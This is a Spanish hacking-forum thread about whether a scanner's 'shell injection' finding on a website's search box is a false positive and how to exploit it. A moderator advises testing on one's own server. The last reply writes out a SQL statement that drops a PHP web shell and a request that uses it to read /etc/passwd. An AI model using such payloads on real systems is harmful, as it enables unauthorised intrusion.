elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  shell injection o falso positivo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: shell injection o falso positivo  (Leído 3,603 veces)
charlymd

Desconectado Desconectado

Mensajes: 17


Ver Perfil
shell injection o falso positivo
« en: 26 Junio 2015, 00:26 am »

El otro día estaba probando el buscador de una página: cuando ingresaba el carácter & me tiraba el típico error 404 de una página realizada  en asp, aunque no podría asegurar que estuviera programada en asp porque se escondía la extensión.  Más tarde, cuando testeé el sitio con Vega, el resultado fue que el buscador de la página, supuestamente, era vulnerable a Shell injection. La pregunta es obvia, ¿cómo se explota esta vulnerabilidad en asp?.
Alguien sabe cómo correr comandos desde una página asp, aunque, como dije, no estoy seguro de que esté programada en asp. Por otra parte, intenté inyectar comandos asp como, por ejemplo, response.write("Hola Mundo") pero no resultó, ahora sospecho que puede ser un falso positivo. Entonces, la pregunta sería: ¿cómo compruebo si se trata de un falso positivo? y ¿cómo exploto Shell injection?.
Desde ya, gracias.

En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: shell injection o falso positivo
« Respuesta #1 en: 26 Junio 2015, 00:52 am »

que tal si intentas montar en un servidor, local o como quieras, tu propia pagina en asp y pruebas las posibles vulnerabilidades antes de atacar algo a ciegas y sin conocimiento
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
charlymd

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: shell injection o falso positivo
« Respuesta #2 en: 26 Junio 2015, 02:09 am »

Soy culpable. Tengo el extraño y raro comportamiento de optar por lo más fácil.
De todas formas, tenes razón.
« Última modificación: 26 Junio 2015, 17:27 pm por charlymd » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: shell injection o falso positivo
« Respuesta #3 en: 5 Julio 2015, 23:24 pm »

Shell Injection no tiene que ver más con el tema de comandos hacia el servidor? No entiendo para que inyectas codigo asp.

:http://www.golemtechnologies.com/articles/shell-injection#shell-injection-overview
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
sqln00b

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: shell injection o falso positivo
« Respuesta #4 en: 19 Julio 2015, 06:51 am »

Buenas, vengo a preguntar. Según mi poca experiencia Shell Injection se refiere a subir una shell vía SQL ¿No?

Es decir ¿En MySQL el comando sería algo así?

Código:
SELECT '<?php system($_GET['cmd']) ?>' INTO DUMPFILE '/../../../shell.php'

Una vez que creé el archivo en el servidor (evidentemente en un lugar accesible) puedo llamar directamente a la shell.

Código:
localhost/shell?cmd=cat /etc/passwd

¿O es otro tipo de ataque? :-[
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
falso positivo XSS con noscript en el foro « 1 2 »
Sugerencias y dudas sobre el Foro
T0rete 10 5,679 Último mensaje 27 Julio 2008, 23:44 pm
por T0rete
¿Falso positivo de contraseña?
Wireless en Linux
Mark Banders 7 3,901 Último mensaje 15 Julio 2011, 16:12 pm
por Mark Banders
services.exe virus o falso positivo? « 1 2 »
Seguridad
tremolero 18 12,200 Último mensaje 15 Septiembre 2012, 15:33 pm
por r32
Falso positivo
Dudas Generales
Rnovatis 1 2,142 Último mensaje 6 Septiembre 2016, 00:06 am
por Eleкtro
Soy yo o el installer de jdownloader no parece un simple falso positivo? « 1 2 »
Seguridad
engel lex 14 10,201 Último mensaje 5 Junio 2018, 20:52 pm
por Machacador
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines